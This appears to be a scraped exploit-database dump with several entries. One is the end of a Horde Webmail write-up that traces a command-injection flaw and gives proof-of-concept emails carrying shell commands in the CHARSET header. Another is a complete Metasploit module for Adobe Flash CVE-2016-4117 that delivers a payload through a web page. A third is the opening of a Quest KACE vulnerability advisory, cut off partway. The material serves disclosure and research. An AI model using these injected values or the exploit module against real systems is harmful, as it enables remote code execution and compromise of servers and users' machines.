CYwRcwJJwoQHM8p86xhSuC/opYPrkBDQQ5PPYqEAQArSW27DriJAFs\r\nOr+fnb3VwsYvznFfEv8NJyM/9/lDYfIROHIhdKCWswUWCgoz813RO2taJi5p8faM048Vczu/\r\nVefTzVrsvpgXUIPQoXjgnbo6UCNuLqGk6TnwdJPPNLuIZLBEhGdA+URtFOA5tSj67h0G4fo0\r\nP8xmsUXNgWVxX/MAAwUD/jUPLFgQ4ThcuUpxCkjMz+Pix0o37tOrFOU/H0cn9SHzCQKxn+iC\r\nsqZlCsR+qXNDl43vSa6Riv/aHtrD+MJLgdIVkufuBWOogtuojusnFGY73xvvM1MfbG+QaUqw\r\ngfe4UYOchLBNVtfN3WiqSPq5Yhue4m1u/xIvGGJQXvSBxNQyiEYEGBECAAYFAjk89ioACgkQ\r\nWyoKbftXl6kV5QCfV7GjnmicwJPgxUQbDMP9u5KuVcsAn3aSmYyI1u6RRlKoThh0WEHayISv\r\niE4EGBECAAYFAjk89ioAEgkQWyoKbftXl6kHZUdQRwABARXlAJ9XsaOeaJzAk+DFRBsMw/27\r\nkq5VywCfdpKZjIjW7pFGUqhOGHRYQdrIhK8=\r\n=RHjX\r\n-----END PGP PUBLIC KEY BLOCK-----\r\n \r\nClick \u201cAdd\u201d button:\r\n \r\nGo to Preferences -> Global Preferences and click on Personal\r\nInformation link. Put [email\u00a0protected] into field The default\r\ne-mail address to use with this identity and Click \u201cSave\u201d:\r\n \r\nCreate our \u201cto\u201d contact in our AddressBook: \u201cAddress Book -> New\r\nContact -> in Address Book of \u2026\u201d\r\n \r\nPersonal tab \u2013 Last Name: contact_for_attack\r\nCommunication tab \u2013 Email: [email\u00a0protected]\r\nOther tab \u2013 PGP Public Key: any valid Public PGP key (it can be the\r\nsame as in the previous step)\r\nAnd click \u201cAdd\u201d button:\r\n \r\nInject our command: Click on Edit. Go to Communication Tab, put cursor\r\nin Email field and chose \u201cInspect Element (Q)\u201d from context menu:\r\n \r\nDelete \u201cemail\u201d from the type argument and close Inspector:\r\n \r\n1\r\n<input name=\"object[email]\" id=\"object_email_\" value=\"[email\u00a0protected]\"\r\ntype=\"email\">\r\n \r\nEdit the address as we want \u2013 for example hereinj$(touch\r\n/tmp/hereisvuln)@any.com and click \u201cSave\u201d:\r\n \r\nCreate a new message ( Mail -> New Message) with our contact as recipient:\r\n \r\nChoose PGP Encrypt Message in Encryption option:\r\n \r\nEnter any subject and any content. Click \u201cSend\u201d\r\n \r\nWe will get \u201cPGP Error:\u2026\u201d\r\n \r\nIt is ok \u2013 let\u2019s check our server:\r\n \r\nWe have a new file \u201chereisvuln\u201d so our command was executed.\r\n \r\nUnauthentication Remote Code Execution\r\nHorde Webmail contains a vulnerability that allows a remote attacker\r\nto execute arbitrary code with the privileges of the user who runs the\r\nweb server.\r\n \r\nVulnerable code: decryptSignature() function of GPG feature.\r\n \r\nPath: /Horde/Crypt/Pgp/Backend/Binary.php:\r\n \r\n/* 539 */ public function decryptSignature($text, $params)\r\n/* 540 */ {\r\n/* ... */\r\n/* 550 */ /* Options for the GPG binary. */\r\n/* 551 */ $cmdline = array(\r\n/* 552 */ '--armor',\r\n/* 553 */ '--always-trust',\r\n/* 554 */ '--batch',\r\n/* 555 */ '--charset ' . (isset($params['charset']) ?\r\n$params['charset'] : 'UTF-8'),\r\n/* 556 */ $keyring,\r\n/* 557 */ '--verify'\r\n/* 558 */ );\r\n/* ... */\r\n/* 571 */ $result = $this->_callGpg($cmdline, 'r', null, true, true, true);\r\n/* ... */\r\n \r\n$params[\u2018charset\u2019] will be added to $cmdline array and passed to _callGpg():\r\n \r\n/* 642 */ public function _callGpg(\r\n/* 643 */ $options, $mode, $input = array(), $output = false, $stderr = false,\r\n/* 644 */ $parseable = false, $verbose = false\r\n/* 645 */ )\r\n/* 646 */ {\r\n/* \u2026 */\r\n/* 675 */ $cmdline = implode(' ', array_merge($this->_gnupg, $options));\r\n/* \u2026 */\r\n/* 681 */ if ($mode == 'w') {\r\n/* \u2026 */\r\n/* 704 */ } elseif ($mode == 'r') {\r\n/* 705 */ if ($fp = popen($cmdline, 'r')) {\r\n/* \u2026 */\r\n \r\nOur $params[\u2018charset\u2019] will be in command line that is going to be executed.\r\n \r\ndecryptSignature() is called from decrypt() method:\r\n \r\nPath \u2013 /Horde/Crypt/Pgp.php:\r\n \r\n/* 611 */ public function decrypt($text, $params = array())\r\n/* 612 */ {\r\n/* 613 */ switch (isset($params['type']) ? $params['type'] : false) {\r\n/* 614 */ case 'detached-signature':\r\n/* 615 */ case 'signature':\r\n/* 616 */ /* Check for required parameters. */\r\n/* 617 */ if (!isset($params['pubkey'])) {\r\n/* 618 */ throw new InvalidArgumentException(\r\n/* 619 */ 'A public PGP key is required to verify a signed message.'\r\n/* 620 */ );\r\n/* 621 */ }\r\n/* 622 */ if (($params['type'] === 'detached-signature') &&\r\n/* 623 */ !isset($params['signature'])) {\r\n/* 624 */ throw new InvalidArgumentException(\r\n/* 625 */ 'The detached PGP signature block is required to verify the\r\nsigned message.'\r\n/* 626 */ );\r\n/* 627 */ }\r\n/* 628 */\r\n/* 629 */ $func = 'decryptSignature';\r\n/* 630 */ break;\r\n/* ... */\r\n/* 650 */ $this->_initDrivers();\r\n/* 651 */\r\n/* 652 */ foreach ($this->_backends as $val) {\r\n/* 653 */ try {\r\n/* 654 */ return $val->$func($text, $params);\r\n/* 655 */ } catch (Horde_Crypt_Exception $e) {}\r\n/* 656 */ }\r\n/* ... */\r\n \r\ndecrypt() with needed parameters is used in verifySignature():\r\n \r\nPath \u2013 /imp/lib/Crypt/Pgp.php\r\n \r\n/* 339 */ public function verifySignature($text, $address, $signature = '',\r\n/* 340 */ $charset = null)\r\n/* 341 */ {\r\n/* 342 */ if (!empty($signature)) {\r\n/* 343 */ $packet_info = $this->pgpPacketInformation($signature);\r\n/* 344 */ if (isset($packet_info['keyid'])) {\r\n/* 345 */ $keyid = $packet_info['keyid'];\r\n/* 346 */ }\r\n/* 347 */ }\r\n/* 349 */ if (!isset($keyid)) {\r\n/* 350 */ $keyid = $this->getSignersKeyID($text);\r\n/* 351 */ }\r\n/* 353 */ /* Get key ID of key. */\r\n/* 354 */ $public_key = $this->getPublicKey($address, array('keyid' => $keyid));\r\n/* 356 */ if (empty($signature)) {\r\n/* 357 */ $options = array('type' => 'signature');\r\n/* 358 */ } else {\r\n/* 359 */ $options = array('type' => 'detached-signature', 'signature'\r\n=> $signature);\r\n/* 360 */ }\r\n/* 361 */ $options['pubkey'] = $public_key;\r\n/* 363 */ if (!empty($charset)) {\r\n/* 364 */ $options['charset'] = $charset;\r\n/* 365 */ }\r\n/* 369 */ return $this->decrypt($text, $options);\r\n/* 370 */ }\r\n \r\nverifySignature() is called from _outputPGPSigned():\r\n \r\nPath \u2013 /imp/lib/Mime/Viewer/Pgp.php\r\n \r\n/* 387 */ protected function _outputPGPSigned()\r\n/* 388 */ {\r\n/* 389 */ global $conf, $injector, $prefs, $registry, $session;\r\n/* 390 */\r\n/* 391 */ $partlist = array_keys($this->_mimepart->contentTypeMap());\r\n/* 392 */ $base_id = reset($partlist);\r\n/* 393 */ $signed_id = next($partlist);\r\n/* 394 */ $sig_id = Horde_Mime::mimeIdArithmetic($signed_id, 'next');\r\n/* 395 */\r\n/* 396 */ if (!$prefs->getValue('use_pgp') || empty($conf['gnupg']['path'])) {\r\n/* 397 */ return array(\r\n/* 398 */ $sig_id => null\r\n/* 399 */ );\r\n/* 400 */ }\r\n/* ... */\r\n/* 417 */ if ($prefs->getValue('pgp_verify') ||\r\n/* 418 */ $injector->getInstance('Horde_Variables')->pgp_verify_msg) {\r\n/* 419 */ $imp_contents = $this->getConfigParam('imp_contents');\r\n/* 420 */ $sig_part = $imp_contents->getMIMEPart($sig_id);\r\n/* ... */\r\n/* 433 */ try {\r\n/* 434 */ $imp_pgp = $injector->getInstance('IMP_Crypt_Pgp');\r\n/* 435 */ if ($sig_raw =\r\n$sig_part->getMetadata(Horde_Crypt_Pgp_Parse::SIG_RAW)) {\r\n/* 436 */ $sig_result = $imp_pgp->verifySignature($sig_raw,\r\n$this->_getSender()->bare_address, null, $sig_part-\r\n> getMetadata(Horde_Crypt_Pgp_Parse::SIG_CHARSET));\r\n/* ... */\r\n \r\nAnd it is used in _renderInline():\r\n \r\nPath \u2013 /imp/lib/Mime/Viewer/Pgp.php\r\n \r\n/* 134 */ protected function _renderInline()\r\n/* 135 */ {\r\n/* 136 */ $id = $this->_mimepart->getMimeId();\r\n/* 138 */ switch ($this->_mimepart->getType()) {\r\n/* ... */\r\n/* 142 */ case 'multipart/signed':\r\n/* 143 */ return $this->_outputPGPSigned();\r\n \r\nLet\u2019s go back to _outputPGPSigned() method. We can see a few\r\nrequirements before the needed call:\r\n \r\n$conf[\u2018gnupg\u2019][\u2018path\u2019] should be not empty. This value can be edited\r\nonly by admin(if he/she wants to allow users to use GPG feature he/she\r\nneeds to define value for this config).\r\nCurrent user has enabled \u201cuse_pgp\u201d feature in his preferences\r\nCurrent user has enabled \u201cpgp_verify\u201d feature in his preferences\r\nCurrent user has enabled \u201cpgp_verify\u201d feature in his preferences\r\n \r\nAlso we see that our charset value is taken from $sig_part ->\r\ngetMetadata(Horde_Crypt_Pgp_Parse::SIG_CHARSET)\r\n \r\nOur value will be stored during parsing of PGP parts:\r\n \r\nPath \u2013 /Horde/Crypt/Pgp/Parse.php\r\n \r\n/* 150 */ public function parseToPart($text, $charset = 'UTF-8')\r\n/* 151 */ {\r\n/* 152 */ $parts = $this->parse($text);\r\n/* ... */\r\n/* 162 */ while (list(,$val) = each($parts)) {\r\n/* 163 */ switch ($val['type']) {\r\n/* ... */\r\n/* 200 */ case self::ARMOR_SIGNED_MESSAGE:\r\n/* 201 */ if ((list(,$sig) = each($parts)) &&\r\n/* 202 */ ($sig['type'] == self::ARMOR_SIGNATURE)) {\r\n/* 203 */ $part = new Horde_Mime_Part();\r\n/* 204 */ $part->setType('multipart/signed');\r\n/* 205 */ // TODO: add micalg parameter\r\n/* 206 */ $part->setContentTypeParameter('protocol',\r\n'application/pgp-signature');\r\n/* 207 */\r\n/* 208 */ $part1 = new Horde_Mime_Part();\r\n/* 209 */ $part1->setType('text/plain');\r\n/* 210 */ $part1->setCharset($charset);\r\n/* 211 */\r\n/* 212 */ $part1_data = implode(\"\\n\", $val['data']);\r\n/* 213 */ $part1->setContents(substr($part1_data, strpos($part1_data,\r\n\"\\n\\n\") + 2));\r\n/* 214 */\r\n/* 215 */ $part2 = new Horde_Mime_Part();\r\n/* 216 */\r\n/* 217 */ $part2->setType('application/pgp-signature');\r\n/* 218 */ $part2->setContents(implode(\"\\n\", $sig['data']));\r\n/* 219 */\r\n/* 220 */ $part2->setMetadata(self::SIG_CHARSET, $charset);\r\n/* 221 */ $part2->setMetadata(self::SIG_RAW, implode(\"\\n\",\r\n$val['data']) . \"\\n\" . implode(\"\\n\", $sig['data']));\r\n/* 222 */\r\n/* 223 */ $part->addPart($part1);\r\n/* 224 */ $part->addPart($part2);\r\n/* 225 */ $new_part->addPart($part);\r\n/* 226 */\r\n/* 227 */ next($parts);\r\n/* 228 */ }\r\n/* 229 */ }\r\n/* 230 */ }\r\n/* 231 */\r\n/* 232 */ return $new_part;\r\n/* 233 */ }\r\n \r\nIt is called from _parsePGP():\r\n \r\nPath \u2013 /imp/lib/Mime/Viewer/Plain.php\r\n \r\n\u00d7\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n/* 239 */ protected function _parsePGP()\r\n/* 240 */ {\r\n/* 241 */ $part =\r\n$GLOBALS['injector']->getInstance('Horde_Crypt_Pgp_Parse')->parseToPart(\r\n/* 242 */ new Horde_Stream_Existing(array(\r\n/* 243 */ 'stream' => $this->_mimepart->getContents(array('stream' => true))\r\n/* 244 */ )),\r\n/* 245 */ $this->_mimepart->getCharset()\r\n/* 246 */ );\r\n \r\nOur charset value is taken from CHARSET attribute of Content-Type\r\nheader of parent MIMEpart.\r\n \r\n_parsePGP() is used in _getEmbeddedMimeParts() method and from Horde\r\nWebmail ver 5.2.0 it looks like:\r\n \r\nPath \u2013 /imp/lib/Mime/Viewer/Plain.php\r\n \r\n/* 222 */ protected function _getEmbeddedMimeParts()\r\n/* 223 */ {\r\n/* 224 */ $ret = $this->getConfigParam('pgp_inline')\r\n/* 225 */ ? $this->_parsePGP()\r\n/* 226 */ : null;\r\n \r\nWe can see an additional requirement \u2013 our function will be called\r\nonly if \u2018pgp_inline\u2018 config parameter is \u201ctrue\u201d. It is defined in:\r\n \r\nPath \u2013 /imp/config/mime_drivers.php\r\n \r\n/* 37 */ /* Scans the text for inline PGP data. If true, will strip this data\r\n/* 38 */ * out of the output (and, if PGP is active, will display the\r\n/* 39 */ * results of the PGP action). */\r\n/* 40 */ 'pgp_inline' => false\r\n \r\nDefault value is false, so the major part of Horde servers is not\r\nvulnerable and our attack is relevant only if an admin manually has\r\nchanged this line to \u2018pgp_inline\u2018 => true.\r\n \r\nBut in older versions (before 5.2.0) the code of\r\n_getEmbeddedMimeParts() is a bit different:\r\n \r\nPath \u2013 /imp/lib/Mime/Viewer/Plain.php\r\n \r\n/* 227 */ protected function _getEmbeddedMimeParts()\r\n/* 228 */ {\r\n/* 229 */ $ret = null;\r\n/* 230 */\r\n/* 231 */ if (!empty($GLOBALS['conf']['gnupg']['path']) &&\r\n/* 232 */ $GLOBALS['prefs']->getValue('pgp_scan_body')) {\r\n/* 233 */ $ret = $this->_parsePGP();\r\n/* 234 */ }\r\n \r\nSo instead of requirement to have config parameter we have requirement\r\nof \u2018pgp_scan_body\u2018 Preference of current user. And it is more likely\r\nto find a victim with needed preferences. We saw where our injected\r\ncommand is executed and from where and when it is taken\r\n \r\nDuring rendering of massage we:\r\n \r\nWill parse PGP values:\r\n \r\n#0 IMP_Mime_Viewer_Plain->_parsePGP() called at\r\n[/imp/lib/Mime/Viewer/Plain.php:225]\r\n#1 IMP_Mime_Viewer_Plain->_getEmbeddedMimeParts() called at\r\n[/Horde/Mime/Viewer/Base.php:298]\r\n#2 Horde_Mime_Viewer_Base->getEmbeddedMimeParts() called at\r\n[/imp/lib/Contents.php:1114]\r\n#3 IMP_Contents->_buildMessage() called at [/imp/lib/Contents.php:1186]\r\n#4 IMP_Contents->getContentTypeMap() called at [/imp/lib/Contents.php:1423]\r\n#5 IMP_Contents->getInlineOutput() called at\r\n[/imp/lib/Ajax/Application/ShowMessage.php:296]\r\n \r\nWill use them in:\r\n \r\n#0 IMP_Mime_Viewer_Plain->_parsePGP() called at\r\n[/imp/lib/Mime/Viewer/Plain.php:225]\r\n#0 IMP_Mime_Viewer_Pgp->_renderInline() called at\r\n[/Horde/Mime/Viewer/Base.php:156]\r\n#1 Horde_Mime_Viewer_Base->render() called at [/Horde/Mime/Viewer/Base.php:207]\r\n#2 Horde_Mime_Viewer_Base->_renderInline() called at\r\n[/Horde/Mime/Viewer/Base.php:156]\r\n#3 Horde_Mime_Viewer_Base->render() called at [/imp/lib/Contents.php:654]\r\n#4 IMP_Contents->renderMIMEPart() called at [/imp/lib/Contents.php:1462]\r\n#5 IMP_Contents->getInlineOutput() called at\r\n[/imp/lib/Ajax/Application/ShowMessage.php:296]]\r\n \r\nIn conclusions:\r\n \r\nIf Horde server has vulnerable configuration:\r\n \r\nEnabled \u201cGnuPG feature\u201d (there is path to gpg binary in\r\n$conf[gnupg][path] setting)\r\nOnly for ver 5.2.0 and newer: \u2018pgp_inline\u2019 => true, in\r\n/imp/config/mime_drivers.php\r\n \r\nAnd the victim has checked the next checkbox in his/her preferences (\r\n\u201cPGP Configure PGP encryption support.\u201d in Prefferences->Mail) :\r\n \r\n\u201cEnable PGP functionality\u201d\r\n\u201cShould PGP signed messages be automatically verified when viewed?\u201d if\r\nit is not checked our command will be executed when the victim clicks\r\non the link \u201cClick HERE to verify the message.\u201d\r\nFor versions before 5.2.0: \u201cShould the body of plaintext message be\r\nscanned for PGP data\u201d\r\n \r\nAn attacker can create email with PGP data, put desired command into\r\nCHARSET attribute of ContentType header, and this command will be\r\nexecuted on Horde server when the victim opens this email.\r\n \r\nProof of Concept \u2013 Remote Code Execution\r\n \r\nFor Proof of Concept we can use preconfigured image of Horde server\r\nfrom Bitnami (Bitnami \u2013 \u201cEasy to use cloud images, containers, and VMs\r\nthat work on any platform\u201d):\r\n \r\nhttps://downloads.bitnami.com/files/stacks/horde/5.2.17-0/bitnami-horde-5.2.17-0-linux-ubuntu-14.04-x86_64.ova\r\n \r\nStep 1 \u2013 Login as admin (by default user:bitnami) and go to\r\nAdministration -> Configuration and choose Horde (horde). Open GnuPG\r\ntab, enter /usr/bin/gpg into $conf[gnupg][path] setting and click\r\n\u201cGenerate Horde Configuration\u201c:\r\n \r\nNow we have enabled GPG feature on our server and we can login as\r\nregular user and try to execute desired commands. But Bitnami image\r\ndoes not have installed and configured Mail server so we need to use\r\nexternal one or install it on local machine.\r\n \r\nWe will use gmail account (to be able to login to it from Horde I had\r\nto change Gmail account setting Allow less secure apps: ON).\r\n \r\nTo use external Mail server we need to change the next setting:\r\n\u201cAdministrator Panel\u201d -> \u201cConfiguration\u201d -> \u201cHorde\u201d ->\r\n\u201cAuthentication\u201d\r\n \r\nConfigure the application authentication ($conf[auth][driver]) \u2013\r\nchange this option to \u201cLet a Horde application handle authentication\u201d\r\nand click \u201cGenerate Horde Configuration\u201d.\r\n \r\nIf we have Horde Webmail ver 5.2.0 or newer we need to edit\r\n/imp/config/mime_drivers.php file. Login to the console of bitnami\r\nimage (default bitnami:bitnami) and run the next command:\r\n \r\nsudo nano /opt/bitnami/apps/horde/htdocs/imp/config/mime_drivers.php\r\n \r\nChange the line: \u201c\u2018pgp_inline\u2019 => false\u201d to \u201c\u2018pgp_inline\u2019 => true\u201d and\r\nsave the changes.\r\n \r\nStep 2 \u2013 Logout and login with your gmail account.\r\n \r\nStep 3 \u2013 Go to Preferences -> Mail and click on PGP link:\r\n \r\nCheck Enable PGP functionality checkbox and click \u201cSave\u201d\r\nCheck Should PGP signed messages be automatically verified when viewed checkbox\r\nFor versions before 5.2.0 check \u201cShould the body of plain-text message\r\nbe scanned for PGP data\u201d checkbox Click \u201cSave\u201d\r\n \r\nFor version before 5.2.0:\r\n \r\nStep 4 \u2013 Go to the Mail, take any mail folder (for example Drafts),\r\nand chose \u201cImport\u201d item from context menu and import attack_whoami.eml\r\nfile (in the end of this blog).\r\n \r\nClick on the imported email:\r\n \r\nOur Horde serve is launched under daemon user\r\n \r\nStep 5 \u2013 We can do the same with attack_touch.eml (in the end of this\r\nblog) file (import it and click on the new mail) and check /tmp\r\nfolder:\r\n \r\nattack_touch.eml\r\n \r\nDate: Fri, 04 Nov 2016 16:04:19 +0000\r\nMessage-ID: <[email\u00a0protected]>\r\nFrom: Donald Trump <[email\u00a0protected]>\r\nTo: [email\u00a0protected]\r\nSubject: PGP_INLine_touch_tmp_youarevuln\r\nX-IMP-Draft: Yes\r\nContent-Type: text/plain; CHARSET=\"US-ASCII`touch /tmp/youarevuln`\";\r\nformat=flowed; DelSp=Yes\r\nMIME-Version: 1.0\r\nContent-Disposition: inline\r\n \r\n \r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n \r\nThis is a sample of a clear signed message.\r\n \r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: 2.6.2\r\n \r\niQCVAwUBMoSCcM4T3nOFCCzVAQF4aAP/eaP2nssHHDTHyPBSjgwyzryguwBd2szF\r\nU5IFy5JfU+PAa6NV6m/UWW8IKczNX2cmaKQNgubwl3w0odFQPUS+nZ9myo5QtRZh\r\nDztuhjzJMEzwtm8KTKBnF/LJ9X05pSQUvoHfLZ/waJdVt4E/xfEs90l8DT1HDdIz\r\nCvynscaD+wA=\r\n=Xb9n\r\n-----END PGP SIGNATURE-----\r\n \r\nattack_whoami.eml\r\n \r\nDate: Fri, 04 Nov 2016 16:04:19 +0000\r\nMessage-ID: <[email\u00a0protected]>\r\nFrom: Donald Trump <[email\u00a0protected]>\r\nTo: [email\u00a0protected]\r\nSubject: PGP_INLine_whoami\r\nX-IMP-Draft: Yes\r\nContent-Type: text/plain; CHARSET=US-ASCII`whoami`; format=flowed; DelSp=Yes\r\nMIME-Version: 1.0\r\nContent-Disposition: inline\r\n \r\n \r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n \r\nThis is a sample of a clear signed message.\r\n \r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: 2.6.2\r\n \r\niQCVAwUBMoSCcM4T3nOFCCzVAQFJaAP/eaP2nssHHDTHyPBSjgwyzryguwBd2szF\r\nU5IFy5JfU+PAa6NV6m/UWW8IKczNX2cmaKQNgubwl3w0odFQPUS+nZ9myo5QtRZh\r\nDztuhjzJMEzwtm8KTKBnF/LJ9X05pSsUvoHfLZ/waJdVt4E/xfEs90l8DT1HDdIz\r\nCvynscaD+wA=\r\n=Xb9n\r\n-----END PGP SIGNATURE-----\n\n# 0day.today [2018-04-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/27576"}], "packetstorm": [{"lastseen": "2019-02-10T19:00:54", "bulletinFamily": "exploit", "description": "", "modified": "2019-02-09T00:00:00", "published": "2019-02-09T00:00:00", "id": "PACKETSTORM:151589", "href": "https://packetstormsecurity.com/files/151589/Adobe-Flash-Player-DeleteRangeTimelineOperation-Type-Confusion.html", "title": "Adobe Flash Player DeleteRangeTimelineOperation Type Confusion", "type": "packetstorm", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::BrowserExploitServer \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion', \n'Description' => %q( \nThis module exploits a type confusion on Adobe Flash Player, which was \noriginally found being successfully exploited in the wild. This module \nhas been tested successfully on: \nmacOS Sierra 10.12.3, \nSafari and Adobe Flash Player 21.0.0.182, \nFirefox and Adobe Flash Player 21.0.0.182. \n), \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Genwei Jiang', # FireEye original blog details on the vulnerability \n'bcook-r7' # Imported Metasploit module \n], \n'References' => \n[ \n['CVE', '2016-4117'], \n['BID', '90505'], \n['URL', 'https://www.fireeye.com/blog/threat-research/2016/05/cve-2016-4117-flash-zero-day.html'], \n['URL', 'http://www.securitytracker.com/id/1035826'], \n['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa16-02.html'], \n['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb16-15.html'], \n], \n'Payload' => \n{ \n'DisableNops' => true \n}, \n'Platform' => ['osx'], \n'BrowserRequirements' => \n{ \nsource: /script|headers/i, \nos_name: lambda do |os| \nos =~ OperatingSystems::Match::MAC_OSX \nend, \nua_name: lambda do |ua| \ncase target.name \nwhen 'Mac OS X' \nreturn true if ua == Msf::HttpClients::SAFARI \nreturn true if ua == Msf::HttpClients::FF \nend \n \nfalse \nend, \nflash: lambda do |ver| \ncase target.name \nwhen 'Mac OS X' \nreturn true if Gem::Version.new(ver) <= Gem::Version.new('21.0.0.182') \nend \n \nfalse \nend \n}, \n'Targets' => \n[ \n[ \n'Mac OS X', { \n'Platform' => 'osx', \n'Arch' => ARCH_X64 \n} \n] \n], \n'Privileged' => false, \n'DisclosureDate' => 'Apr 27 2016', \n'DefaultTarget' => 0)) \nend \n \ndef exploit \n@swf = create_swf \n \nsuper \nend \n \ndef on_request_exploit(cli, request, target_info) \nprint_status(\"Request: #{request.uri}\") \n \nif request.uri.end_with? 'swf' \nprint_status('Sending SWF...') \nsend_response(cli, @swf, 'Content-Type' => 'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache') \nreturn \nend \n \nprint_status('Sending HTML...') \nsend_exploit_html(cli, exploit_template(cli, target_info), 'Pragma' => 'no-cache') \nend \n \ndef exploit_template(cli, target_info) \nswf_random = \"#{rand_text_alpha(3..7)}.swf\" \ntarget_payload = get_payload(cli, target_info) \nb64_payload = Rex::Text.encode_base64(target_payload) \n \nif target.name.include? 'osx' \nplatform_id = 'osx' \nend \nhtml_template = %(<html> \n<body> \n<object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" /> \n<param name=\"movie\" value=\"<%=swf_random%>\" /> \n<param name=\"allowScriptAccess\" value=\"always\" /> \n<param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>\" /> \n<param name=\"Play\" value=\"true\" /> \n<embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>\" Play=\"true\"/> \n</object> \n</body> \n</html> \n) \n \nreturn html_template, binding \nend \n \ndef create_swf \npath = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2016-4117', 'msf.swf') \nFile.binread(path) \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/151589/adobe_flash_delete_range_tl_op.rb.txt"}, {"lastseen": "2018-06-01T10:31:25", "bulletinFamily": "exploit", "description": "", "modified": "2018-05-31T00:00:00", "published": "2018-05-31T00:00:00", "id": "PACKETSTORM:148005", "href": "https://packetstormsecurity.com/files/148005/Quest-KACE-System-Management-Appliance-8.0-Build-8.0.318-XSS-Traversal-Code-Execution-SQL-Injection.html", "title": "Quest KACE System Management Appliance 8.0 (Build 8.0.318) XSS / Traversal / Code Execution / SQL Injection", "type": "packetstorm", "sourceData": "`Core Security - Corelabs Advisory \nhttp://corelabs.coresecurity.com/ \n \nQuest KACE System Management Appliance Multiple Vulnerabilities \n \n1. *Advisory Information* \n \nTitle: Quest KACE System Management Appliance Multiple Vulnerabilities \nAdvisory ID: CORE-2018-0004 \nAdvisory URL: \nhttp://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities \nDate published: 2018-05-31 \nDate of last update: 2018-05-22 \nVendors contacted: Quest Software Inc. \nRelease mode: Forced release \n \n2. *Vulnerability Information* \n \nClass: Improper Neutralization of Special Elements used in an OS Command \n[CWE-78], Improper Neutralization of Special Elements used in an OS Command \n[CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege \nManagement [CWE-269], Improper Privilege Management [CWE-269], Improper \nAuthorization [CWE-285], Improper Neutralization of Special Elements used \nin an SQL Command [CWE-89], Improper Neutralization of Special Elements \nused in an SQL Command [CWE-89], Improper Neutralization of Input During \nWeb Page Generation [CWE-79], External Control of File Name or Path \n[CWE-73], External Control of File Name or Path [CWE-73] \nImpact: Code execution \nRemotely Exploitable: Yes \nLocally Exploitable: Yes \nCVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134, \nCVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140, \nCVE-2018-11133, \nCVE-2018-11137, CVE-2018-11141 \n \n3. *Vulnerability Description* \n \n>From Quest KACE's website: \n \n\"The KACE Systems Management Appliance [1] provides \nyour growing organization with comprehensive management of network-connected \ndevices, including servers, PCs, Macs, Chromebooks, tablets, printers, \nstorage, networking gear and the Internet of Things (IoT). KACE can fulfill \nall of your organization's systems management needs, from initial deployment \nto ongoing management and retirement.\" \n \nMultiple vulnerabilities were found in the Quest KACE System Management \nVirtual Appliance that would allow a remote attacker to gain command \nexecution as root. We present three vectors to achieve this, including \none that can be exploited as an unauthenticated user. \n \nAdditional web application vulnerabilities were found in the web console \nthat is bundled with the product. These vulnerabilities are detailed in \nsection 7. \n \nNote: This advisory has limited details on the vulnerabilities because \nduring the attempted coordinated disclosure process, Quest advised us not \nto distribute our original findings to the public or else they would \ntake legal action. Quest's definition of \"responsible disclosure\" can be \nfound at \nhttps://support.quest.com/essentials/reporting-security-vulnerability. \n \nCoreLabs has been publishing security advisories since 1997 and believes \nin coordinated disclosure and good faith collaboration with software vendors \nbefore disclosure to help ensure that a fix or workaround solution is ready \nand available when the vulnerability details are publicized. We believe \nthat providing technical details about each finding is necessary to provide \nusers and organizations with enough information to understand the \nimplications \nof the vulnerabilities against their environment and, most importantly, to \nprioritize the remediation activities aiming at mitigating risk. \n \nWe regret Quest's posture on disclosure during the whole process (detailed \nin the Report Timeline section) and the lack of a possibility of engaging \ninto a coordinated publication date, something we achieve (and have \nachieved) with many vendors as part of our coordinated disclosure practices. \n \n4. *Vulnerable Packages* \n \n. Quest KACE System Management Appliance 8.0 (Build 8.0.318) \nOther products and versions might be affected too, but they were not tested. \n \n5. *Vendor Information, Solutions and Workarounds* \n \nQuest reports that it has released the security vulnerability patch \nSEC2018_20180410 to address the reported vulnerabilities. \nPatch can be download at \nhttps://support.quest.com/download-install-detail/6086148. \n \nFor more details, Quest published the following Security Note: \nhttps://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410- \n \n6. *Credits* \n \nThese vulnerabilities were discovered and researched by Leandro Barragan \nand Guido Leo from Core Security Consulting Services. The publication of \nthis advisory was coordinated by Leandro Cuozzo from Core Advisories Team. \n \n7. *Technical Description / Proof of Concept Code* \n \nQuest KACE SMA ships with a web console that provides administrators and \nusers with several features. Multiple vulnerabilities were found in the \ncontext of this console, both from an authenticated and unauthenticated \nperspective. \n \nSection 7.1 describes how an unauthenticated attacker could gain command \nexecution on the system as the web server user. \n 